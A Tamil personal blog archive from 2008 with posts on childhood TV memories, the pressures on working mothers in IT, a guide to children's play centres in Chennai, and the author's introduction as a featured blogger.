அந்த டீம் இந்தியா முழுக்க சுத்தி, கலைகள், கலாச்சார நிகழ்வுகள், இன்னொரு கலாச்சாரத்தோட இருக்கும் தொடர்புகள், அந்தந்த இடத்தில் ஃபேமஸா இருக்கும் கைவினை பொர்ருட்கள்,அதை எப்படி செய்கிறார்கள், வரலாற்று பின்னனி எல்லாவற்றையும் கொஞ்சம் கூட போரடிக்காம சொல்லுவாங்க!!அதை விட அந்த நிகழ்ச்சியை தொகுத்தளித்த சித்தார்த் கக் மற்றும் ரேணுகே சஹானி…..நிகழ்ச்சி பார்ப்ப்பவர்களை தக்கவைத்துக்கொள்ளும் திறமையும், சுண்டியிருக்கக்கூடிய பேச்சுத்திறமையும் இருந்தது, நிகழ்ச்சியின் ஒரு வெற்றிக்கு காரணம்!! அதுவும் இல்லாம அதுல ஒரு குவிஸ் வரும்..யாஷ் பால் என்னும் ஒரு பேராசிரியர் விளக்கத்தோட விடையளிப்பார்!! திரும்பவும் ஒளிப்பரப்பினால் நன்றாக இருக்கும்!!


அடுத்து லிஸ்ட்ல இருக்கறது, வாக்லே கி துனியா திங்கள் இரவு ஒளிபரப்ப்பாகும்! ஒரு குடியிருப்பில வசிக்கும் மத்திய தர வர்க்கத்தினரான மிஸ்டர் & மிஸஸ் வாக்லே தமபதியினரின் வாழ்க்கையை நகைச்சுவையோடு சொல்லும் நிகழ்ச்சி!!
வாரம் ஒரு எபிஸோடு. இஅது புரிந்துக்கொள்ள தொடர்ச்சியாக பார்த்திருக்க
வேண்டுமென்ற தேவையில்லை!!

ஜஸ்பால் பட்டி-யின் நகைச்சுவை சீரியல். அதில் என்ன ஸ்பெஷல் என்றால், டைட்டில் கார்டு போடுவது ரொம்ப க்ரியேடிவாகவும் காமெடியுடனும் இருக்கும்!!

ஃபாஜி, சர்க்கஸ்– பாஜிகர் பார்ப்பத்றகு முன்பே என்னை ஷாருக்கின் விசிறியாக்கியதற்கு இவை இரண்டிற்க்கும் முக்கிய பங்குண்டு!

ஓஷின் – ஒரு ஜப்பானியசிறுமி வீட்டு வேலை செய்ய அனுப்பபடுவதும், அவளுடைய வாழ்க்கையைப் பற்றியதும்.

குவிஸ் கான்டெஸ்ட் – சித்தார்த் பாசு நடத்தியது.
இன்னொருத்தர், டெரிக் ஓ ப்ரியென். போர்ன்விட்டா குவிஸ் கான்டெஸ்ட்(ஜீ டீவிலன்னு நினைக்கிறேன்!!).அவர் கேள்வியை என்னவோ அங்கே பங்கேற்பாளர்களிடம்தான் கேட்பார், ஆனால் வீட்டில் இருப்பவர்கள் நம்மை திரும்பிப் பார்ப்பார்கள்..அப்போதான், பாத்ரூம் போவதும், தண்னீர் குடிப்பதும் என்று செம காமெடியா இருக்கும்!!

கின்னஸ் ரெக்கார்ட்ஸ் – கணப்பு அடுப்பு பின்னால் எரிய, ஒருவர் நாற்கலியில் அமர்ந்துகொண்டே, பேசிவார். ஆனால், அதற்குப்பின் காண்பிக்கப்ப்டும் கிளிப்பிங்ஸ் ஜாலியா இருக்கும்!!

இன்னொரு நிகழ்ச்சி…அதை பத்தி சொல்லன்னா தெய்வ குத்தம் ஆகிடும்
ஹாட் ஸ்பாட்..ன்னு பார்வதி கான்-ன்னு ஒரு பாப் சிங்கர் தொகுத்து வழங்குவாங்க.நம்ம தேசி பாப்லாம் அதுலதான் வரும்…ரெமோ மட்டும்தான் ஞாபகம் இருக்கு!இதை பார்த்தவங்க யாராவது ஞாபகமிருந்தா சொல்லுங்களேன்!

இதெல்லாம் நல்லா போய்கிட்டு இருக்கும்போதுதான், கேபிள் டீவி-ன்னு ஒண்னு வந்தது. அதாவது, விட்டில் ஆண்டெனா இல்லாமலேயே, கேபிள் கனெக்ஷன் இருந்தா DD மட்டுமல்ல..நிறையச் சேனல்கள் வரும்னு ஒரு லிஸ்ட் வேறே..ஸ்டார், பிபிசி, எம் டீவி, அப்புறம் வீ சேனல் இதெல்லாம்!! அது மட்டும் இலலாம ஊர்ல எந்த ஸ்கூல்லயாவது ஆண்டு விழா நடந்தா, அதுல கல்சுரல்சஸ் எல்லாத்தையும் ரெக்கார்ட் செஞ்சு, அப்பப்ப அதை போட்டுகாட்டுவாங்க!! செம கலாட்டாவா இருக்கும்..அந்த கேபிள் டீவிகாரர்களுக்கு தெரிந்த/உறவின பசங்களை ஏதாவது பார்க் நடுவுல பாட்டு போட்டு ஆட விட்டு, அதை ரெக்கார்ட் செஞ்சு அடிக்கடி ஒளிபரப்பி ஒரே புதுமைல்லாம் செஞ்சிக்கிட்டிருந்தாங்க எங்க ஊர்ல!!

இது மட்டும் இல்லாம, இல்லாம தினமும் மத்தியானம் ஒரு தமிழ் படம் போடுவார்கள்
டெக்-ல இருக்கற பழைய படமெல்லாம் போடுவாங்க, அப்பப்ப புதுசும். உடனே ஆபீஸ் போகிறவர்கள் சும்மா இல்லாம, பகல்லா போட்டா லேடிசஸ் மட்டும்தான் பாக்கிறாங்க,நைட்ல
போடுங்கன்னு! அப்புறம் நைட்டும் போட ஆரம்பிச்சாங்க..எங்க ஏரியால முஸ்லீம் மக்கள் அதிகம்..அவங்க உடனே , எலலம் தமிழாதான் போடறீங்க, ஒருநாளாவது இந்திபடம் வேணும், இல்லன்னா கேபிள் வேணாம்னு சொல்ல, வெள்ளிகிழமை இரவு இந்திபடம் போட ஆரம்பிச்சாங்க! ஸ்கூல்லாம் லீவு விட்டா, வீட்டில இருக்க குட்டீஸ்ல்லாம் சேர்ர்ந்து, அண்ணா, அண்ணா, காலையிலே படம் போடுங்க..மத்தியானம் வேணாம்னு சொல்ல, டெக்ல படம் போடறதுக்குனே ஒரு லோக்கல் சேனல் உருவாகி, இப்போ ஊருக்கு போனா,
அந்த சேனல்ல ஒரு பொன்னு வாயை சுத்தி லிப்ஸ்டிக் போட்டுக்கிட்டு போன்ல பேசிகிட்டிருக்கு..”ஓக்கே..ந்ல்லாயிர்க்கிங்கலா?
என்ன பண்றீங்க..எந்த ஸ்கூல்..ஓக்கே…டெடிக்கேட் பன்றீங்களா
-ன்னு!! ம்ம்..பேக் டூ த பாயிண்ட்!!

கேபிள் கொஞ்சம் கொஞ்சமா பரிணாம வளர்ச்சி அடைஞ்சிக்கிட்டிருந்தப்போதான், திடீர்னு ஒரு சேனல்..சன் ன்னு!!ஆரம்பத்தில இ.மாலா-ன்னு ஒரு ஆண்ட்டி வருவாங்க!! அழகா இருப்பாங்க அந்த ஆண்ட்டி. இப்ப என்ன பண்றாங்கன்னு தெரியல!அப்புறம் வார்த்தை விளையாட்டு..கேம்ஸ் ஷோ, சினிமா குவிஸ், ரபி பெர்னார்டின் நேருக்கு நேர், பிரபலங்களின் பேட்டி என்று புதுப் புது நிகழ்ச்சிகள்!! ஆனா அப்ப பார்த்து நான் பப்ளிக் எக்ஸாம்..நிறைய மிஸ் பண்ணிட்டேன்!

இப்போ எத்தனையோ சேனல்கள்..நிறைய நிகழ்ச்சிகள்..
பார்க்க நேரமுமில்லை…பார்க்கும்படியாய் எந்த நிகழ்ச்சியுமில்லை!
விளம்பரங்கள் மட்டுமே ரசிக்கும்படியாயிருக்கிறது இப்பொழுதும் அப்போழுதும்!!

ஒரே வித்தியாசம், நாங்கள் எது பார்த்தாலும், பெற்றோரும் கூடவே இருப்பார்கள். அல்லது அவர்கள் அனுமதியோடு! (டீவிக்கு சென்சார்) அதுவும் குறிப்பிட்ட நேரம் வரைதான்.
பொதுவாக எல்லார் வீடுகளிலும் (அல்லது டீச்சர் வீடுகளில் மட்டுமோ??) கடைபிடிக்கப் பட்டு வந்தது! ஆனால் இப்போது ?

Add a comment ஜூலை 23, 2008

நாங்களும் இந்திராநூயிக்களும்

வேலைக்கு செல்லும் தாயாக இருப்பது, கொஞ்சம் கடினமானதுதான்.
எனது அம்மாவும், அம்மாவின் அம்மாவுமே ”வேலைக்கு செல்லும் தாய்”
இனத்தை சேர்ந்தவர்கள்தாம்! எனது அம்மா, இன்னும் பணியிலிருக்கிறார்.
எனக்கு நினைவு தெரிந்த நாள் முதல் வேலைக்கு சென்றுக் கொண்டிருக்கிறார்.
ஆனால், எனக்குத் தேவையான போது (அதாவது, நான் பள்ளியிலிருந்து வரும் நேரம்) வீட்டில் இருந்திருக்கிறார். ஒரு நாளும்,நான் தனித்து விடப்பட்டோ அல்லது வேறு யாருடனோ(வேலைக்கார ஆயா) இருந்ததில்லை, நான் இப்போது பப்புவை விடுவதைப் போல!! அதே போல எனது தாயும் இருந்ததில்லை, ஏனெனில், எனது பாட்டி,
பிள்ளைகள் பிறந்ததும் வேலையை விட்டுவிட்டு, அவர்கள் வளர்ந்து தன்னை தானே
கவனித்துக் கொள்ளும் வயது வரை வீட்டில் இருந்து, அதன் பின் வேலையை தொடர்ந்தார்.
அவரது காலம் அபப்டி. மேலும் வேலையும் சுலபமாய் கிடைத்தது ஒரு காரணமாய் இருக்கலாம். ஆனால், அவரகளது வேலைப் பளு, வேலைக் களம் வேறு.
அதையும், எனது வேலைப் பளுவும் ஒப்பிட முடியாதுதான்!
ஏனெனில், அவர்களது ஒரு குறிப்பிட்ட நேரத்தில் சென்று, வீடு திரும்புபவர்கள்.
எங்களுக்கு உடல்நிலை சரியில்லாத போது, மதியம் வீடு வந்து செல்லக்கூடிய வசதி அவர்களுக்கு இருந்தது! மாலை ஆறு மணியிலிருந்து எங்களுடன் செலவழிக்க அவர்களிடம் நேரம் இருந்தது. உணவு தயாரிக்கவும்,ஒன்றாக அமர்ந்து உணவருந்தவும், பொறுமை இருந்தது! ஆனால், எனக்கோ ஆபீஸ் போக குறைந்தது அரைமணி நேரமாவது ஆகும்.
வேலைப் பளுவைப் பொறுத்து வீடு திரும்புவது 7 மணியோ 8 மணியோ ஆகலாம்!!
பப்பு தூங்குவதற்குள் வீடு வந்து சேர்வதே, என்னைப் பொறுத்த வரை மிகப் பெரியக்
காரியம்!!

ஒரு சில அதிர்ஷ்டசாலிக்களுக்கு அம்மாவோ அல்லது மாமியாரோ
கூட இருந்து பார்த்துக் கொள்ளக்கூடிய வசதி இருக்கும். அதற்கேற்றவாறு அதன் நிறை குறைகள் இருந்தாலும், பிள்ளை வேறு யாருடனோ இருப்பதற்கு, நமது உறவினரிடம் இருப்பது எவ்வளவோ பாதுகாப்பானது அல்லவா! அதற்காக எனது குழந்தையை வெளியூர்களில் இருக்கும் அம்மாவிடமோ, மாமியாரிடமோ விட முடியாது!! அப்படி விட்டு விட்டு வாழும் வாழ்க்கையில், என்னைப் பொறுத்தவரை அர்த்தமே இல்லை! குற்றவுணர்சியே என்னைக் கொன்றுவிட போதுமானது, அந்நிலையில்!!எனது குழந்தை எனது பொறுப்பில் இருப்பதுதான் சிறந்தது!! ஆனால் வேறு வழியில்லாமல், அவ்வாறு விடும் தாய்களையும் நான் அறிவேன்!!

இன்னும் ஒரு சிலரையும் நான் கடந்து வந்திருக்கிறேன்…தனது பிள்ளைக்காக தனது
கேரியரை தியாகம் செய்தத் தோழிகள்! இவர்கள், அந்த முடிவுக்குத் தள்ளப்பட்டார்கள் என்றுச் சொல்வதே சரியாக இருக்கும். ஏனெனில்,கனவுகளோடு படித்து,ஆசையாய் உருவாக்கிய கேரியர் (career)ஐ, விட்டு விட யாருமே விரும்பமாட்டார்கள். ஆனால், பெரும்பாலும், அந்த முடிவை பெரும்பாலும் பெண்கள்தான் எடுக்க வேண்டியிருக்கிறது. ஒருசில வருடங்களில் குழந்தை வளர்ந்து தன் வேலைகளை தானே பார்த்துக் கொள்ளும் பட்சத்தில், அவர்களுக்கு இதிலிருந்து சற்று ஓய்வு கிடைக்கலாம். ஆனால், அவர்களது மறுபிரவேசம், விட்ட இடத்திலிருந்து தொடர்வது எனபதுச் சற்று கடினம்தான், ஐ.டி-ஐ பொறுத்த வரை. ஒரு சில கம்பெனிகளில் வாரத்தில் சில நாட்கள் வீட்டிலிருந்து வேலை செய்யும் முறை இருப்பதனால்,நல்ல உதவியாயிருக்கிறது!!

பெரும்பாலானவர்கள், என்னைப் போல, ஒரு வேலைக்கார ஆயாவிடம் குழந்தையை விட்டு, அல்லது குழந்தைகள் காப்பகத்தில் காலையில் விட்டு விட்டு, பின்னர் வீடு திரும்பும்போது அழைத்துச் செல்வது!! ஏதோ ஒரு ஆய்வில் போட்டிருந்தார்கள், ஒரு நிலைக்கு மேல் பெண்கள் நிர்வாக ஏணியில் வளர்வதில்லை, மாறாக ஆண்கள் மட்டுமே வளர்ச்சியடைகிறார்கள் என்பதாக!!திடீரென வராமல் ஏமாற்றும் வேலைக்கார பெண்கள், தான் ஆபீஸ் சென்றாலும் குழந்தை சாப்பிட்டதா என வேலைகளினூடே கவலை,எந்த ப்ராக்ஜட்டில் தூக்கிப் போட்டாலும் சலிக்காமல் பச்சோந்தியாய் கொடுத்த வேலைக்கு தன்னை புதுப்பித்துக் கொள்வது இந்த டென்ஷன்களின் மத்தியில் கொடுத்த வேலையை ஒழுங்க்காக செய்துவிட்டு நேரத்திற்கு வீட்டிற்கு சென்றாலே போதும் என்றுதான் தோன்றும். இதனாலேயே, எனக்கு மேலாண்மை நிர்வாக வேலை வேண்டாம், ஆனால் டெக்னிக்கல் சைடில் மட்டுமே இருந்தால் போதும் என்று முடிவெடுக்கிறவர்களும் இருக்கிறார்கள். என்னுடைய நிறைய சீனியர்கள் அப்படித்தான்!!ஏனெனில் இந்த மாதிரி முடிவெடுக்கும் நிலைக்கு அவர்க்ள் வரும்போது, குறைந்தது 6 வருடங்கள் எக்ஸ்பீரியன்ச் இருக்கும். அப்போதுதான், லீட் மாதிரியான பதவிகள் கொடுக்கப்படும்! (கம்பெனியைப் பொறுத்து
ரோல்கள் மாறுபடலாம்!!)

ஏனெனில், ஒரு பெரிய கப்பெனியின் ceo போஸ்டில் இருக்கிறேனென்பதைவிட, புத்திசாலியான, ஒரு நல்ல பொறுப்பான குழந்தையை வளர்த்திருக்கிறேன் என்பதே நான் மட்டும் இல்லை பெரும்பாலான பெண்கள் விரும்பும்/எடுக்கும் முடிவாக இருக்கும் ,
வேலையா குழந்தையா என வரும் போது!

மெட்டர்னிட்டி லீவ் எடுத்தால் ஒரு சில கம்பெனிகளில், உங்களில் அடுத்த பதவி உயர்வு பாதிக்கப் படக்கூடும்!! எவ்வளவு அபத்தமாக இருக்கிறது? மேலும், என் அம்மா கால்த்தில் 6 மாதங்களாக இருந்த மெட்டர்னிட்டி லீவ், இப்போதெல்லாம் 90 நாட்கள்தான், அதாவது 3 மாதங்கள்!! மேலும் நமக்கு ஈ.எல் இருந்தால் எடுத்துக் கொள்ளலாம், அதுவும் 3 மாதங்களுக்கு மிகாது. ஆனால், இந்தக் விடுப்புக்காலம் பதவியுயர்வுக்கு கணக்கில் எடுத்துக்கொள்ளப்பட மாட்டாது!!

இதில், யாராவது இந்திரா நூயியையோ அல்லது பத்மஸ்ரீ வாரியரையோ ஒப்பிட்டாலோ அல்லது
உதாரணம் காட்டினாலோ, எப்படி அவர்கள் அந்த உயரத்தை எட்டினார்கள் என்று கேட்பதை விட, அவர்கள் வீட்டை,குழந்தைகளை யார் மேனேஜ் செய்தார்கள் என்றே கேட்கத் தோன்றுகிறது!! ஆனால், வீட்டையும்,குழந்தையையும் தானே நிர்வகித்துக் கொண்டு, வேலையிலும் வளர்ச்சியடைந்துள்ளவர்கள் யாரேனும் இருந்தால் காட்டுங்கள், ரோல்மாடல் தேவைப்படுகிறது எனக்கு!!

நீங்கள் அன்றாடம் அலுவலகத்தில் சந்திக்கும் உங்கள் பக்கத்து க்யூப் பெண்களின் புன்னகைக்குப் பின்னால் இருக்கும் வாழ்க்கையும், பிரச்சினைகளும் இதுதான்!!

Add a comment ஜூலை 21, 2008

சென்னையில் குழந்தைகளின் விளையாட்டுலகம்

ஏழுவயதுகுட்பட்ட குழந்தை உங்களுக்கு இருக்கிறதா?
இல்லை, நீங்கள் ஒரு சித்தி-சித்தப்பா, அத்தை-மாமா என்று அழைக்கக் கூடிய
ஒரு சுட்டி உங்கள் வீட்டில் உண்டா? கிண்டி குழந்தைகள் பூங்கா, வண்டலூர் விலங்கியல் பூங்கா….பீச்.. இதை விட்டால் சென்னையில் குழந்தைகளுக்கு வேறு பொழுதுபோக்கே கிடையாதா என்று சலித்துக் கொளபவரா நீங்கள்? அப்படியென்றால், இந்த பதிவு உங்களுக்காக!!

ஒன்றரை வயது வரை வீட்டிலேயே குழந்தைகளை எண்டர்டெயின் செய்து விடலாம்.
ஆனால், அருகில பார்க் இருந்தால், மற்ற குழந்தைகளை பார்த்து, பழக ஏதுவாக இருக்கும்.
ஆனால், இரண்டு வயதுக்கு மேல், வீட்டில் மட்டுமே இருப்பது இருவருக்குமே தொல்லை!!
உறவினர்கள், மற்றும் அக்கம் பக்கத்தினரை மட்டுமே பார்த்து வளர்ந்த குழந்தை,
புதிதாக மற்றவர்களிடம் பழக தயக்கம் காட்டும்.பயப்படும்!
பார்க் அருகில் இருந்தால் மிக வசதி. ஆனால் கொஞ்ச நாட்களில் சலித்துவிடும் அல்லது,விடுமுறை நாட்களில் கூட்டம் மிகுதியாய் இருக்கும். எவ்வளவு விளையாட்டு சாமன்கள் வாங்குவது? எது வாங்கினாலும், ஒன்றிரண்டு நாட்களுக்குத்தான், பின், அது அக்குவேறாக, ஆணிவேறாக! ஒரு வாரம் கழித்து அது இருக்கும் இடம் தெரியாது!!

வெறுத்துப் போன நான், வேறு என்ன மாறுதல் என சென்னையை அலசியதில்,பப்புவிற்காக எனக்கு கிடைத்தவை இதோ உங்களுக்காகவும்!

வெனிலா சில்ட்ரன்ஸ் ப்ளேஸ்

இது மயிலாப்பூரில் லஸ் அவென்யூ வில் இருக்கிறது. முகவரியும் சுட்டியும் கீழே!!
இது ஒரு குழந்தைகள் விளயாட்டு மையம். குழந்தையோடு நீங்களும் அங்உ இருக்க வேண்டியது அவசியம். தரை முழுவதும், மென்மையான விழுந்தாலும் அடிபடாத ஸ்பாஞ்ச். குதிக்க், ஓட நல்ல இடம். விழுந்து அடிபடுமோவென அஞ்ச தேவையில்லை. இதை நடத்துவது இஸ்ரவேலிலிருந்து ஒருவர். அங்கிருக்கும் விளையாட்டு பொருட்களனைத்தும் அங்கிருந்து வந்தது. இது மட்டுமில்லாமல், பல்வேறு பயிற்சிகளும் உண்டு. பப்புவிற்கு இப்போது அந்த பயிற்சிகள் தேவையில்லை என நான் கருதியதாலும், சென்று வரும் தூரத்தினையும் கணக்கில்
கொள்ளவேண்டியிருப்பதினாலும் அவற்றில் ஆர்வம் காட்டவில்லை!

மொபைலிலிருந்து எடுக்கப்பட்ட புகைப்படம்!

சிறார்களின் அறைக்குத் தேவையான கட்டில், அலமாரி, நாற்காலி, அலங்காரப் பொருட்கள் உண்டு.ஒரு Wi-Fi கனெகஷனுடன் கூடிய கஃபேயும் உண்டு. (juices/potata wedges are yummy!!)

நுழைவுக் கட்டனம் : ரூ 150
நேரம் : எவ்வளவு நேரம் வேண்டுமானாலும்.

Vanilla
No. 8/57, 1st Street Luz Avenue
Mylapore
Chennai 600 004
INDIA
Phone
91 44 4553 4146
http://www.vanillaplace.com/

பேபிஸ் டே அவுட்

இது ஆழ்வார்பேட்டையில் இருக்கிறது. இங்கு எக்கசக்க விளையாட்டுச் சாமான்கள்…இரண்டு தளங்களில் இயங்குகிறது!! ஒரு அறையில் சிறு ஊஞ்சல், சறுக்குமரம், மின்சாரத்தில் இயங்கும் சீ-சா, முன்னும் பின்னும் இயங்கக் கூடிய கார், ஜீப். மற்றொரு அறையில், ஒரு பெரிய சமையலறை செட், எலக்ட்ரானிக் பேசும் இயந்திரம், பின் சிறு சிறு blocks விளையாட்டுகள், ஜிக் சா புதிர்கள், புத்தகங்கள், சைக்கிள், கிரிக்கெட் விளையாட வலையிட்ட இடம் இன்ன பிற.
இங்கு நாமும் குழந்தையுடன் இருக்கலாம் அலல்து, அங்கு இருப்பவரிகளின் பொறுப்பில் விட்டும் செல்லலாம். நாமும் இருந்தால் பிள்ளையை எண்ட்ர்டெயின் செய்யலாம். மேலும், அவர்களை விளையாட விட்டுவிட்டு நாம் கண்காணித்துக் கொண்டு ஓய்வு எடுக்கலாம்!

பதிவுக் கட்டணம் : 200
நுழைவுக் கட்டணம் : ரூ 200 ஒன்றரை மணி நேரத்திற்கு (3 மணிநேரத்திற்கு ரூ 300 etc)

# 105,Chamiers Road, Chamiers Road,RA Puram, Chennai, Tamilnadu 600028, India
+91 44 64581234

ஹன்சல் & க்ரீட்டல்

இது தி நகரில் இருக்கிறது.
இங்கும் குழந்தைகள் விளையாட நிறைய விளையாட்டுச் சாமான்கள்.
புதிர்கள், வர்ணங்கள் தீட்டும் புத்தகங்கள், குழந்தைகளை கவரும் வண்ண வண்ண பந்துத் தொட்டி! மேலும், குழந்தைகள் படம் பார்கக் வச்தியான மினி தியேட்டரும் உண்டு!
என்னை அசத்தியது, அவர்களின் புத்தகக் கலெக்ஷன்!

பதிவுக் கட்டணம் : இல்லை
நுழைவுக் கட்டணம் : ரூ 75 ஒரு மணி நேரத்திற்கு

11 (Old No. 6), Jagadambal Street (First Floor)
T.Nagar
Chennai – 600017
Ph: 044 28152549
http://www.hanselandgretel.in

மால்களுக்கு கூட்டி செல்ல எனக்கு விருப்பமில்லை! மேலும் அவள் வயதையொத்த சிறார்களுடன் பழக நல்ல வாய்ப்பு! மேலும், அந்தப் பொருட்களை வாங்கும் சக்தி நமக்கு இல்லையெனினும், குறைந்த பட்சம் இவற்றை அவர்களுக்கு காண்பித்துக் கொடுத்த திருப்தி!! ஒவ்வொரு வாரமும் போக முடியாதெனினும், ஒரே மாதிரியான விளையாட்டிலிருந்து கொஞ்சம் மாறுதலாயிருக்கும்!!

பப்புவோடு சேர்ந்து நானும் என் குழந்தைப் பருவத்தை மீண்டும் வாழ்ந்து பார்க்கிறேன்!!
உங்களுக்கும் நல்ல அனுபவங்கள் இருந்தால், அல்லது இது போன்ற வேறு இடங்கள் இருந்தால்
பகிர்ந்துக் கொள்ளுங்கள்!!

Add a comment ஜூலை 20, 2008

பதிவுலகத்திற்கு…

வணக்கம்,

”பசும் புல்வெளியில் துள்ளித் திரிய மானுக்கென்ன தயக்கமா,
நந்தவனத்தில் தேன் குடிக்க வண்டுகென்ன தயக்கமா…
உங்கள் முன் உரையாட அடியேனுக்கென்ன தயக்கமா?” – இப்படிதாங்க ஏதொவொரு பேச்சுப் போட்டில பேசி ஜெயிச்சிட்டேன், ஆறாவதோ ஏழாவதோ படிக்கும்போது!!
அப்புறமா, ”பாரதியாம் பாரதி ” – இந்த ரேஞ்சுல கவிதை வேற எழுதி இருக்கேன்.
இதுல, டீச்சருங்க கொடுத்த உற்சாகத்தில தமிழ் நம்ம நாக்குல துள்ளி விளையாடுதுன்னு மமதை வேற!! இதையெல்லாம் ஒரு பெரிய தகுதியா நினைச்சு இந்த ”சித்திரக்கூடத்தை “ தொடங்கினதுல, இப்போ நட்சத்திரமாவும் ஆகிட்டேன்.

அதனால, நீஙக இப்போ திட்டனும்னா, இல்ல ஆட்டோ அனுப்பனும்னா, அனுப்ப வேண்டிய முகவரி : இதோ!! ஏன்னா, சுட்ஜி தான், நீங்க ஏன் தமிழுக்கு தொண்டாற்றக்கூடாதுன்னு, சும்மா இருந்த சங்கை…! 2004-ல “ஹனி டியூ’ ன்ற பேரில ஒரு வலைப்பூ தொடங்கிட்டு, அதை சுத்தமா மறந்திட்டேன்,ஒரே ஒரு பதிவு ஆங்கிலத்தில போட்டுட்டு. அவ்வளவு சுறுசுறுப்பு!

நம்ம ஓமப்பொடியார் சுதர்சனின் வலைப்பூவின் வழியாக நான் வந்து இறங்கிய இடம் தமிழ்மணம், தேன்கூடு!. ஃப்ரீயா இருக்கும்போது படிக்கலாம்னு புக்மார்க்கிட்டு, அப்பப்ப படிச்சிகிட்டிருந்தது போய், பத்து நிமிடஙகளுக்கு ஒரு முறை திறந்து பார்ப்பதனால் டாஸ்க் பாரில் நிரந்தரமாகி விட்டது தமிழ்மணம் இப்போது!!

என்னோட சிறு வயது நினைவுகள்,நிகழ்வுகளை பதிந்து வைத்துக்கொள்வதற்காக ஆரம்பித்த வலைபதிவு இப்போது என் மகள் பப்புவின் குறும்புகளையும், மழலை பேச்சுகளையும் சுவாரசியமான நிகழ்வுகளையும் படம் பிடிக்கிறது!வளர்ந்தப்பின், அவள் ஒரு நாள் இதை படிக்கையில், அவள் எவ்வள்வு சுவாரசியமானவளாயிருந்திருக்கிறாளென்பதை
அவளுக்கு உணர்த்தக்கூடும், இந்த வலைப்பூ! (போதுமா முன்கதை சுருக்கம்!!)

ம்ம்..திங்கள் காலையில் ஆபிஸ் லாகின்-ஆனதும் செய்யும் முதல் வேலை, யாரு இந்த வார ஸ்டார்ன்னு பார்க்கறதுதான்!! எனக்கு அது ஒரு த்ரில்!!
அநேகமா, நிறைய பேரு அப்படிதான்னு நினைக்கிறேன்…

உங்கள் எதிர்பார்ப்புக்கு ஏற்ற வகையில் என்னால் எழுத இயலாமல் போகலாம்!
மனப்பாடம் செய்துக்கொண்டு, மேடையில் ஏறிய அந்த சிறுமி இன்னும் என்னுள் ஒளிந்துக்கொண்டு, அவ்வப்போது வெளிப்படலாம்!!

பொறுமை காத்து ஆதரவு அளிக்கவும்!!

Add a comment ஜூலை 18, 2008

பக்கங்கள்

பிரிவுகள்

தொடுப்புகள்

மேல்

நாட்காட்டி

பிப்ரவரி 2019
தி செ பு விய வெ ஞா
« டிசம்பர்    
 123
45678910
11121314151617
18192021222324
25262728  

Posts by Month

Posts by Category